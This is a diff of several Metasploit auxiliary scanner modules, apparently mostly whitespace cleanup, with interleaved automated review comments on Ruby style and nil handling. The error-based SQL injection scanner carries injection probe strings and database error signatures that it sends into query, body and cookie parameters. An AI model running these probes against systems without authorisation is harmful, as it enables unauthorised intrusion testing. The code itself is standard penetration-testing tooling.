'uri' => filec,
|
||||
'method' => 'GET',
|
||||
'ctype' => 'text/plain'
|
||||
}, 20)
|
||||
|
||||
|
||||
if(not res or ((res.code.to_i == ecode) or (emesg and res.body.index(emesg))))
|
||||
if dm == false
|
||||
print_status("NOT Found #{filec} #{res.code} [#{wmap_target_host}] [#{res.code.to_i}]")
|
||||
print_status("NOT Found #{filec} #{res.code} [#{wmap_target_host}] [#{res.code.to_i}]")
|
||||
end
|
||||
else
|
||||
if ecode != 400 and res.code.to_i == 400
|
||||
print_error("[#{wmap_target_host}] Server returned a 400 error on #{wmap_base_url}#{filec} [#{res.code.to_i}]")
|
||||
else
|
||||
else
|
||||
print_status("[#{wmap_target_host}] Found #{wmap_base_url}#{filec} [#{res.code.to_i}]")
|
||||
|
||||
|
||||
report_note(
|
||||
:host => ip,
|
||||
:proto => 'HTTP',
|
||||
@ -149,9 +149,9 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
|
||||
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
|
||||
rescue ::Timeout::Error, ::Errno::EPIPE
|
||||
rescue ::Timeout::Error, ::Errno::EPIPE
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
|
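Review bot: `print_status("NOT Found #{filec} #{res.code} ...")` dereferences `res` after the guard `if(not res or ((res.code.to_i == ecode) ...))` has already admitted a nil response, so a request that returns nil while `NoDetailMessages` is false raises NoMethodError, and the `rescue` clauses shown below it (Rex connection errors, `::Timeout::Error`, `::Errno::EPIPE`) do not cover that, so `run_host` aborts for the host. A `next unless res` placed before that comparison keeps the existing messages unchanged for real responses. Second, `File.open(datastore['HTTP404Sigs']).each do |str|` opens the signature file without a block, so the descriptor is only released when the object is collected; `File.foreach(datastore['HTTP404Sigs']) do |str|` closes it, and since each yielded line keeps its newline, `res.body.index(str.chomp)` is probably the intended match (confirm against the signature file format). `run_host` begins in an earlier hunk, so the `begin` these rescue clauses belong to is not fully visible here.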
@ -1,5 +1,9 @@
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
@ -17,29 +21,29 @@ class Metasploit3 < Msf::Auxiliary
|
||||
include Msf::Auxiliary::Report
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'HTTP Directory Listing Scanner',
|
||||
'Description' => %q{
|
||||
This module identifies directory listing vulnerabilities
|
||||
in a given directory path.
|
||||
This module identifies directory listing vulnerabilities
|
||||
in a given directory path.
|
||||
},
|
||||
'Author' => [ 'et' ],
|
||||
'License' => BSD_LICENSE,
|
||||
'Version' => '$Revision$'))
|
||||
|
||||
'Version' => '$Revision$'))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('PATH', [ true, "The path to identify directoy listing", '/'])
|
||||
], self.class)
|
||||
|
||||
], self.class)
|
||||
|
||||
end
|
||||
|
||||
def run_host(ip)
|
||||
|
||||
tpath = datastore['PATH']
|
||||
|
||||
tpath = datastore['PATH']
|
||||
if tpath[-1,1] != '/'
|
||||
tpath += '/'
|
||||
end
|
||||
end
|
||||
|
||||
begin
|
||||
res = send_request_cgi({
|
||||
@ -51,7 +55,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
if (res and res.code >= 200 and res.code < 300)
|
||||
if res.to_s.include? "<title>Index of /" and res.to_s.include? "<h1>Index of /"
|
||||
print_status("Found Directory Listing #{wmap_base_url}#{tpath}")
|
||||
|
||||
|
||||
report_note(
|
||||
:host => ip,
|
||||
:proto => 'HTTP',
|
||||
@ -59,12 +63,12 @@ class Metasploit3 < Msf::Auxiliary
|
||||
:type => 'DIR_LISTING',
|
||||
:data => "#{tpath}"
|
||||
)
|
||||
|
||||
|
||||
end
|
||||
|
||||
if res.to_s.include? "[To Parent Directory]</A>" and res.to_s.include? "#{tpath}</H1><hr>"
|
||||
print_status("Found Directory Listing #{wmap_base_url}#{tpath}")
|
||||
|
||||
|
||||
report_note(
|
||||
:host => ip,
|
||||
:proto => 'HTTP',
|
||||
@ -72,15 +76,15 @@ class Metasploit3 < Msf::Auxiliary
|
||||
:type => 'DIR_LISTING',
|
||||
:data => "#{tpath}"
|
||||
)
|
||||
|
||||
|
||||
end
|
||||
|
||||
else
|
||||
print_status("NOT Vulnerable to directory listing #{wmap_base_url}#{tpath}")
|
||||
print_status("NOT Vulnerable to directory listing #{wmap_base_url}#{tpath}")
|
||||
end
|
||||
|
||||
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
|
||||
rescue ::Timeout::Error, ::Errno::EPIPE
|
||||
rescue ::Timeout::Error, ::Errno::EPIPE
|
||||
end
|
||||
end
|
||||
end
|
||||
|
@ -1,4 +1,7 @@
|
||||
#!/usr/bin/env ruby
|
||||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
@ -15,7 +18,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Pull Del.icio.us Links (URLs) for a domain',
|
||||
'Description' => %q{ This module pulls and parses the URLs stored by Del.icio.us users for the
|
||||
'Description' => %q{ This module pulls and parses the URLs stored by Del.icio.us users for the
|
||||
purpose of replaying during a web assessment. Finding unlinked and old pages. },
|
||||
'Author' => [ 'Rob Fuller <mubix [at] hak5.org>' ],
|
||||
'License' => MSF_LICENSE,
|
||||
@ -23,7 +26,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
register_options(
|
||||
[
|
||||
OptString.new('DOMAIN', [ true, "Domain to request URLS for"]),
|
||||
OptString.new('OUTFILE', [ false, "Where to output the list for use"])
|
||||
OptString.new('OUTFILE', [ false, "Where to output the list for use"])
|
||||
], self.class)
|
||||
|
||||
register_advanced_options(
|
||||
@ -55,30 +58,30 @@ class Metasploit3 < Msf::Auxiliary
|
||||
lastpage = 1
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
list.delete_if{|x| x==nil}
|
||||
list.uniq!
|
||||
list.sort!
|
||||
|
||||
|
||||
return list
|
||||
end
|
||||
|
||||
|
||||
def write_output(data)
|
||||
print_status("Writing URLs list to #{datastore['OUTFILE']}...")
|
||||
file_name = datastore['OUTFILE']
|
||||
file_name = datastore['OUTFILE']
|
||||
if FileTest::exist?(file_name)
|
||||
print_status("OUTFILE already existed, appending..")
|
||||
else
|
||||
print_status("OUTFILE did not exist, creating..")
|
||||
end
|
||||
|
||||
|
||||
File.open(file_name, 'a') do |fd|
|
||||
fd.write(data)
|
||||
end
|
||||
|
||||
|
||||
|
||||
|
||||
end
|
||||
|
||||
|
||||
def run
|
||||
if datastore['PROXY']
|
||||
@proxysrv,@proxyport = datastore['PROXY'].split(":")
|
||||
@ -87,21 +90,21 @@ class Metasploit3 < Msf::Auxiliary
|
||||
else
|
||||
@proxysrv,@proxyport = nil, nil
|
||||
end
|
||||
|
||||
|
||||
target = datastore['DOMAIN']
|
||||
|
||||
urls = []
|
||||
print_status("Pulling urls from Delicious.com")
|
||||
urls = pull_urls(target)
|
||||
|
||||
|
||||
print_status("Located #{urls.count} addresses for #{target}")
|
||||
|
||||
if datastore['OUTFILE']
|
||||
|
||||
if datastore['OUTFILE']
|
||||
write_output(urls.join("\n") + "\n")
|
||||
else
|
||||
urls.each do |i|
|
||||
puts(i)
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
|
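Review bot: `list.delete_if{|x| x==nil}` is `list.compact!` — the explicit nil comparison is the idiom a linter flags — and the same `delete_if`/`uniq!`/`sort!` tail reappears in the Archive.org module in the next section, where the following `for i in (0..(pages.count-1))` loop that prefixes each entry is `pages.map! { |p| "http://" + p.to_s }`. In `write_output`, `FileTest::exist?(file_name)` is the older spelling of `File.exist?(file_name)`. In `run`, `puts(i)` writes straight to the process's stdout rather than the module's output channel, so the URLs can end up apart from the surrounding `print_status` messages when the module is driven from anything but a plain console; `print_line(i)` keeps them together. `pull_urls` begins before the first hunk shown here, so only its tail is visible.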
@ -1,4 +1,7 @@
|
||||
#!/usr/bin/env ruby
|
||||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
@ -15,7 +18,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Pull Archive.org stored URLs for a domain',
|
||||
'Description' => %q{ This module pulls and parses the URLs stored by Archive.org for the purpose of
|
||||
'Description' => %q{ This module pulls and parses the URLs stored by Archive.org for the purpose of
|
||||
replaying during a web assessment. Finding unlinked and old pages. },
|
||||
'Author' => [ 'Rob Fuller <mubix [at] hak5.org>' ],
|
||||
'License' => MSF_LICENSE,
|
||||
@ -23,7 +26,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
register_options(
|
||||
[
|
||||
OptString.new('DOMAIN', [ true, "Domain to request URLS for"]),
|
||||
OptString.new('OUTFILE', [ false, "Where to output the list for use"])
|
||||
OptString.new('OUTFILE', [ false, "Where to output the list for use"])
|
||||
], self.class)
|
||||
|
||||
register_advanced_options(
|
||||
@ -45,34 +48,34 @@ class Metasploit3 < Msf::Auxiliary
|
||||
response.each do |line|
|
||||
pages << line.gsub!(/(.+>)(.+)(<\/a><br>)\n/, '\2')
|
||||
end
|
||||
|
||||
|
||||
pages.delete_if{|x| x==nil}
|
||||
pages.uniq!
|
||||
pages.sort!
|
||||
|
||||
|
||||
for i in (0..(pages.count-1))
|
||||
fix = "http://" + pages[i].to_s
|
||||
pages[i] = fix
|
||||
end
|
||||
return pages
|
||||
end
|
||||
|
||||
|
||||
def write_output(data)
|
||||
print_status("Writing URLs list to #{datastore['OUTFILE']}...")
|
||||
file_name = datastore['OUTFILE']
|
||||
file_name = datastore['OUTFILE']
|
||||
if FileTest::exist?(file_name)
|
||||
print_status("OUTFILE already existed, appending..")
|
||||
else
|
||||
print_status("OUTFILE did not exist, creating..")
|
||||
end
|
||||
|
||||
|
||||
File.open(file_name, 'a') do |fd|
|
||||
fd.write(data)
|
||||
end
|
||||
|
||||
|
||||
|
||||
|
||||
end
|
||||
|
||||
|
||||
def run
|
||||
if datastore['PROXY']
|
||||
@proxysrv,@proxyport = datastore['PROXY'].split(":")
|
||||
@ -81,21 +84,21 @@ class Metasploit3 < Msf::Auxiliary
|
||||
else
|
||||
@proxysrv,@proxyport = nil, nil
|
||||
end
|
||||
|
||||
|
||||
target = datastore['DOMAIN']
|
||||
|
||||
urls = []
|
||||
print_status("Pulling urls from Archive.org")
|
||||
urls = pull_urls(target)
|
||||
|
||||
|
||||
print_status("Located #{urls.count} addresses for #{target}")
|
||||
|
||||
if datastore['OUTFILE']
|
||||
|
||||
if datastore['OUTFILE']
|
||||
write_output(urls.join("\n") + "\n")
|
||||
else
|
||||
urls.each do |i|
|
||||
puts(i)
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
|
@ -3,7 +3,7 @@
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
@ -24,16 +24,16 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'HTTP Error Based SQL Injection Scanner',
|
||||
'Description' => %q{
|
||||
This module identifies the existence of Error Based SQL injection issues. Still requires alot of work
|
||||
|
||||
|
||||
},
|
||||
'Author' => [ 'et [at] cyberspace.org' ],
|
||||
'License' => BSD_LICENSE,
|
||||
'Version' => '$Revision$'))
|
||||
|
||||
'Version' => '$Revision$'))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('METHOD', [ true, "HTTP Method",'GET']),
|
||||
@ -42,55 +42,55 @@ class Metasploit3 < Msf::Auxiliary
|
||||
OptString.new('DATA', [ false, "HTTP Body Data", '']),
|
||||
OptString.new('COOKIE',[ false, "HTTP Cookies", ''])
|
||||
], self.class)
|
||||
|
||||
|
||||
register_advanced_options(
|
||||
[
|
||||
OptBool.new('NoDetailMessages', [ false, "Do not display detailed test messages", true ])
|
||||
], self.class)
|
||||
|
||||
|
||||
end
|
||||
|
||||
def run_host(ip)
|
||||
|
||||
|
||||
gvars = nil
|
||||
pvars = nil
|
||||
cvars = nil
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
sqlinj = [
|
||||
[ "'" ,'Single quote'],
|
||||
[ "')",'Single quote and parenthesis'],
|
||||
[ "\"",'Double quote'],
|
||||
[ "#{rand(10)}'", 'Random value with single quote']
|
||||
[ "#{rand(10)}'", 'Random value with single quote']
|
||||
]
|
||||
|
||||
|
||||
errorstr = [
|
||||
["Unclosed quotation mark after the character string",'MSSQL','string'],
|
||||
["Syntax error in string in query expression",'MSSQL','string'],
|
||||
["Microsoft OLE DB Provider",'MSSQL','unknown'],
|
||||
["You have an error in your SQL syntax",'MySQL','unknown'],
|
||||
["java.sql.SQLException",'unknown','unknown']
|
||||
["java.sql.SQLException",'unknown','unknown']
|
||||
]
|
||||
|
||||
|
||||
#
|
||||
# Dealing with empty query/data and making them hashes.
|
||||
#
|
||||
|
||||
|
||||
if !datastore['QUERY'] or datastore['QUERY'].empty?
|
||||
datastore['QUERY'] = nil
|
||||
gvars = nil
|
||||
else
|
||||
gvars = queryparse(datastore['QUERY']) #Now its a Hash
|
||||
end
|
||||
|
||||
|
||||
if !datastore['DATA'] or datastore['DATA'].empty?
|
||||
datastore['DATA'] = nil
|
||||
pvars = nil
|
||||
else
|
||||
pvars = queryparse(datastore['DATA'])
|
||||
end
|
||||
|
||||
|
||||
if !datastore['COOKIE'] or datastore['COOKIE'].empty?
|
||||
datastore['COOKIE'] = nil
|
||||
cvars = nil
|
||||
@ -100,50 +100,50 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
|
||||
#
|
||||
# Send normal request to check if error is generated
|
||||
# Send normal request to check if error is generated
|
||||
# (means the error is caused by other means)
|
||||
#
|
||||
#
|
||||
|
||||
|
||||
begin
|
||||
normalres = send_request_cgi({
|
||||
'uri' => datastore['PATH'],
|
||||
'vars_get' => gvars,
|
||||
'vars_get' => gvars,
|
||||
'method' => datastore['METHOD'],
|
||||
'ctype' => 'application/x-www-form-urlencoded',
|
||||
'cookie' => datastore['COOKIE'],
|
||||
'data' => datastore['DATA']
|
||||
}, 20)
|
||||
|
||||
|
||||
|
||||
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
|
||||
rescue ::Timeout::Error, ::Errno::EPIPE
|
||||
rescue ::Timeout::Error, ::Errno::EPIPE
|
||||
end
|
||||
|
||||
|
||||
if !datastore['NoDetailMessages']
|
||||
print_status("Normal request sent.")
|
||||
print_status("Normal request sent.")
|
||||
end
|
||||
|
||||
|
||||
found = false
|
||||
inje = nil
|
||||
dbt = nil
|
||||
injt = nil
|
||||
|
||||
|
||||
if normalres
|
||||
errorstr.each do |estr,dbtype,injtype|
|
||||
if normalres.body.include? estr
|
||||
found = true
|
||||
inje = estr
|
||||
dbt = dbtype
|
||||
injt = injtype
|
||||
injt = injtype
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
if found
|
||||
print_error("[#{wmap_target_host}] Error string appears in the normal response, unable to test")
|
||||
print_error("[#{wmap_target_host}] Error string: '#{inje}'")
|
||||
print_error("[#{wmap_target_host}] Error string: '#{inje}'")
|
||||
print_error("[#{wmap_target_host}] DB TYPE: #{dbt}, Error type '#{injt}'")
|
||||
|
||||
|
||||
report_note(
|
||||
:host => ip,
|
||||
:proto => 'HTTP',
|
||||
@ -151,64 +151,64 @@ class Metasploit3 < Msf::Auxiliary
|
||||
:type => 'DATABASE_ERROR',
|
||||
:data => "#{datastore['PATH']} Error: #{inje} DB: #{dbt}"
|
||||
)
|
||||
|
||||
|
||||
return
|
||||
end
|
||||
else
|
||||
print_error("[#{wmap_target_host}] No response")
|
||||
return
|
||||
return
|
||||
end
|
||||
|
||||
|
||||
#
|
||||
# Test URI Query parameters
|
||||
#
|
||||
|
||||
|
||||
found = false
|
||||
|
||||
|
||||
if gvars
|
||||
sqlinj.each do |istr,idesc|
|
||||
|
||||
if found
|
||||
break
|
||||
|
||||
if found
|
||||
break
|
||||
end
|
||||
|
||||
gvars.each do |key,value|
|
||||
|
||||
gvars.each do |key,value|
|
||||
gvars = queryparse(datastore['QUERY']) #Now its a Hash
|
||||
gvars[key] = gvars[key]+istr
|
||||
|
||||
|
||||
if !datastore['NoDetailMessages']
|
||||
print_status("- Testing query with #{idesc}. Parameter #{key}:")
|
||||
print_status("- Testing query with #{idesc}. Parameter #{key}:")
|
||||
end
|
||||
|
||||
|
||||
begin
|
||||
testres = send_request_cgi({
|
||||
'uri' => datastore['PATH'],
|
||||
'vars_get' => gvars,
|
||||
'vars_get' => gvars,
|
||||
'method' => datastore['METHOD'],
|
||||
'ctype' => 'application/x-www-form-urlencoded',
|
||||
'cookie' => datastore['COOKIE'],
|
||||
'data' => datastore['DATA']
|
||||
}, 20)
|
||||
|
||||
|
||||
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
|
||||
rescue ::Timeout::Error, ::Errno::EPIPE
|
||||
rescue ::Timeout::Error, ::Errno::EPIPE
|
||||
end
|
||||
|
||||
if testres
|
||||
if testres
|
||||
errorstr.each do |estr,dbtype,injtype|
|
||||
if testres.body.include? estr
|
||||
found = true
|
||||
inje = estr
|
||||
dbt = dbtype
|
||||
injt = injtype
|
||||
injt = injtype
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
if found
|
||||
print_status("[#{wmap_target_host}] SQL Injection found. (#{idesc}) (#{datastore['PATH']})")
|
||||
print_status("[#{wmap_target_host}] Error string: '#{inje}' Test Value: #{gvars[key]}")
|
||||
print_status("[#{wmap_target_host}] Error string: '#{inje}' Test Value: #{gvars[key]}")
|
||||
print_status("[#{wmap_target_host}] Vuln query parameter: #{key} DB TYPE: #{dbt}, Error type '#{injt}'")
|
||||
|
||||
|
||||
report_note(
|
||||
:host => ip,
|
||||
:proto => 'HTTP',
|
||||
@ -216,40 +216,40 @@ class Metasploit3 < Msf::Auxiliary
|
||||
:type => 'SQL_INJECTION',
|
||||
:data => "#{datastore['PATH']} Location: QUERY Parameter: #{key} Value: #{istr} Error: #{inje} DB: #{dbt}"
|
||||
)
|
||||
|
||||
|
||||
break
|
||||
end
|
||||
else
|
||||
print_error("[#{wmap_target_host}] No response")
|
||||
print_error("[#{wmap_target_host}] No response")
|
||||
return
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
gvars = queryparse(datastore['QUERY'])
|
||||
end
|
||||
|
||||
|
||||
#
|
||||
# Test DATA parameters
|
||||
#
|
||||
|
||||
|
||||
found = false
|
||||
|
||||
|
||||
if pvars
|
||||
sqlinj.each do |istr,idesc|
|
||||
|
||||
if found
|
||||
break
|
||||
|
||||
if found
|
||||
break
|
||||
end
|
||||
|
||||
pvars.each do |key,value|
|
||||
|
||||
pvars.each do |key,value|
|
||||
pvars = queryparse(datastore['DATA']) #Now its a Hash
|
||||
|
||||
|
||||
if !datastore['NoDetailMessages']
|
||||
print_status("- Testing data with #{idesc}. Parameter #{key}:")
|
||||
print_status("- Testing data with #{idesc}. Parameter #{key}:")
|
||||
end
|
||||
|
||||
|
||||
pvars[key] = pvars[key]+istr
|
||||
|
||||
|
||||
pvarstr = ""
|
||||
pvars.each do |tkey,tvalue|
|
||||
if pvarstr
|
||||
@ -257,19 +257,19 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
pvarstr << tkey+'='+tvalue
|
||||
end
|
||||
|
||||
|
||||
begin
|
||||
testres = send_request_cgi({
|
||||
'uri' => datastore['PATH'],
|
||||
'vars_get' => gvars,
|
||||
'vars_get' => gvars,
|
||||
'method' => datastore['METHOD'],
|
||||
'ctype' => 'application/x-www-form-urlencoded',
|
||||
'cookie' => datastore['COOKIE'],
|
||||
'data' => pvarstr
|
||||
}, 20)
|
||||
|
||||
|
||||
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
|
||||
rescue ::Timeout::Error, ::Errno::EPIPE
|
||||
rescue ::Timeout::Error, ::Errno::EPIPE
|
||||
end
|
||||
|
||||
if testres
|
||||
@ -278,15 +278,15 @@ class Metasploit3 < Msf::Auxiliary
|
||||
found = true
|
||||
inje = estr
|
||||
dbt = dbtype
|
||||
injt = injtype
|
||||
injt = injtype
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
if found
|
||||
print_status("[#{wmap_target_host}] SQL Injection found. (#{idesc}) (#{datastore['PATH']})")
|
||||
print_status("[#{wmap_target_host}] Error string: '#{inje}' Test Value: #{istr}")
|
||||
print_status("[#{wmap_target_host}] Error string: '#{inje}' Test Value: #{istr}")
|
||||
print_status("[#{wmap_target_host}] Vuln data parameter: #{key} DB TYPE: #{dbt}, Error type '#{injt}'")
|
||||
|
||||
|
||||
report_note(
|
||||
:host => ip,
|
||||
:proto => 'HTTP',
|
||||
@ -294,39 +294,39 @@ class Metasploit3 < Msf::Auxiliary
|
||||
:type => 'SQL_INJECTION',
|
||||
:data => "#{datastore['PATH']} Location: DATA Parameter: #{key} Value: #{istr} Error: #{inje} DB: #{dbt}"
|
||||
)
|
||||
|
||||
|
||||
break
|
||||
end
|
||||
else
|
||||
print_error("[#{wmap_target_host}] No response")
|
||||
print_error("[#{wmap_target_host}] No response")
|
||||
return
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
#
|
||||
# Test COOKIE parameters
|
||||
#
|
||||
|
||||
|
||||
found = false
|
||||
|
||||
|
||||
if datastore['COOKIE']
|
||||
sqlinj.each do |istr,idesc|
|
||||
|
||||
if found
|
||||
break
|
||||
|
||||
if found
|
||||
break
|
||||
end
|
||||
|
||||
cvars.each do |key,value|
|
||||
|
||||
cvars.each do |key,value|
|
||||
cvars = queryparse(datastore['COOKIE']) #Now its a Hash
|
||||
|
||||
|
||||
if !datastore['NoDetailMessages']
|
||||
print_status("- Testing cookie with #{idesc}. Parameter #{key}:")
|
||||
print_status("- Testing cookie with #{idesc}. Parameter #{key}:")
|
||||
end
|
||||
|
||||
|
||||
cvars[key] = cvars[key]+istr
|
||||
|
||||
|
||||
cvarstr = ""
|
||||
cvars.each do |tkey,tvalue|
|
||||
if cvarstr
|
||||
@ -334,19 +334,19 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
cvarstr << tkey+'='+tvalue
|
||||
end
|
||||
|
||||
|
||||
begin
|
||||
testres = send_request_cgi({
|
||||
'uri' => datastore['PATH'],
|
||||
'vars_get' => gvars,
|
||||
'vars_get' => gvars,
|
||||
'method' => datastore['METHOD'],
|
||||
'ctype' => 'application/x-www-form-urlencoded',
|
||||
'cookie' => cvarstr,
|
||||
'data' => datastore['DATA']
|
||||
}, 20)
|
||||
|
||||
|
||||
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
|
||||
rescue ::Timeout::Error, ::Errno::EPIPE
|
||||
rescue ::Timeout::Error, ::Errno::EPIPE
|
||||
end
|
||||
|
||||
if testres
|
||||
@ -355,15 +355,15 @@ class Metasploit3 < Msf::Auxiliary
|
||||
found = true
|
||||
inje = estr
|
||||
dbt = dbtype
|
||||
injt = injtype
|
||||
injt = injtype
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
if found
|
||||
print_status("[#{wmap_target_host}] SQL Injection found. (#{idesc}) (#{datastore['PATH']})")
|
||||
print_status("[#{wmap_target_host}] Error string: '#{inje}' Test Value: #{istr}")
|
||||
print_status("[#{wmap_target_host}] Error string: '#{inje}' Test Value: #{istr}")
|
||||
print_status("[#{wmap_target_host}] Vuln cookie parameter: #{key} DB TYPE: #{dbt}, Error type '#{injt}'")
|
||||
|
||||
|
||||
report_note(
|
||||
:host => ip,
|
||||
:proto => 'HTTP',
|
||||
@ -371,15 +371,15 @@ class Metasploit3 < Msf::Auxiliary
|
||||
:type => 'SQL_INJECTION',
|
||||
:data => "#{datastore['PATH']} Location: COOKIE Parameter: #{key} Value: #{istr} Error: #{inje} DB: #{dbt}"
|
||||
)
|
||||
|
||||
|
||||
break
|
||||
end
|
||||
else
|
||||
print_error("[#{wmap_target_host}] No response")
|
||||
print_error("[#{wmap_target_host}] No response")
|
||||
return
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
|
@ -1,6 +1,9 @@
|
||||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
@ -18,31 +21,31 @@ class Metasploit3 < Msf::Auxiliary
|
||||
include Msf::Auxiliary::Report
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'HTTP File Same Name Directory Scanner',
|
||||
'Description' => %q{
|
||||
This module identifies the existence of files
|
||||
in a given directory path named as the same name of the
|
||||
This module identifies the existence of files
|
||||
in a given directory path named as the same name of the
|
||||
directory.
|
||||
|
||||
Only works if PATH is differenet than '/'.
|
||||
Only works if PATH is differenet than '/'.
|
||||
},
|
||||
'Author' => [ 'et [at] metasploit.com' ],
|
||||
'License' => BSD_LICENSE,
|
||||
'Version' => '$Revision$'))
|
||||
|
||||
'Version' => '$Revision$'))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('PATH', [ true, "The directory path to identify files", '/']),
|
||||
OptString.new('EXT', [ true, "File extension to use", '.aspx'])
|
||||
|
||||
], self.class)
|
||||
|
||||
|
||||
], self.class)
|
||||
|
||||
end
|
||||
|
||||
def run_host(ip)
|
||||
extensions = [
|
||||
'.null',
|
||||
extensions = [
|
||||
'.null',
|
||||
'.backup',
|
||||
'.bak',
|
||||
'.c',
|
||||
@ -53,7 +56,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
'.html',
|
||||
'.htm',
|
||||
'.log',
|
||||
'.old',
|
||||
'.old',
|
||||
'.orig',
|
||||
'.tar',
|
||||
'.tar.gz',
|
||||
@ -66,20 +69,20 @@ class Metasploit3 < Msf::Auxiliary
|
||||
]
|
||||
|
||||
tpath = datastore['PATH']
|
||||
|
||||
|
||||
if tpath.eql? "/"||""
|
||||
print_error("Blank or default PATH set.");
|
||||
return
|
||||
end
|
||||
|
||||
|
||||
if tpath[-1,1] != '/'
|
||||
tpath += '/'
|
||||
end
|
||||
end
|
||||
|
||||
testf = tpath.split('/').last
|
||||
|
||||
extensions << datastore['EXT']
|
||||
|
||||
|
||||
extensions.each { |ext|
|
||||
begin
|
||||
testfext = testf.chomp + ext
|
||||
@ -89,9 +92,9 @@ class Metasploit3 < Msf::Auxiliary
|
||||
'ctype' => 'text/plain'
|
||||
}, 20)
|
||||
|
||||
if (res and res.code >= 200 and res.code < 300)
|
||||
if (res and res.code >= 200 and res.code < 300)
|
||||
print_status("Found #{wmap_base_url}#{tpath}#{testfext}")
|
||||
|
||||
|
||||
report_note(
|
||||
:host => ip,
|
||||
:proto => 'HTTP',
|
||||
@ -99,16 +102,16 @@ class Metasploit3 < Msf::Auxiliary
|
||||
:type => 'FILE',
|
||||
:data => "#{tpath}#{testfext} Code: #{res.code}"
|
||||
)
|
||||
|
||||
|
||||
else
|
||||
print_status("NOT Found #{wmap_base_url}#{tpath}#{testfext}")
|
||||
print_status("NOT Found #{wmap_base_url}#{tpath}#{testfext}")
|
||||
end
|
||||
|
||||
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
|
||||
rescue ::Timeout::Error, ::Errno::EPIPE
|
||||
rescue ::Timeout::Error, ::Errno::EPIPE
|
||||
end
|
||||
|
||||
|
||||
}
|
||||
|
||||
|
||||
end
|
||||
end
|
||||
|
@ -3,7 +3,7 @@
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
@ -21,65 +21,65 @@ class Metasploit3 < Msf::Auxiliary
|
||||
include Msf::Auxiliary::Report
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'HTTP Interesting File Scanner',
|
||||
'Description' => %q{
|
||||
This module identifies the existence of interesting files
|
||||
in a given directory path.
|
||||
This module identifies the existence of interesting files
|
||||
in a given directory path.
|
||||
},
|
||||
'Author' => [ 'et' ],
|
||||
'License' => BSD_LICENSE,
|
||||
'Version' => '$Revision$'))
|
||||
|
||||
'Version' => '$Revision$'))
|
||||
|
||||
register_options(
|
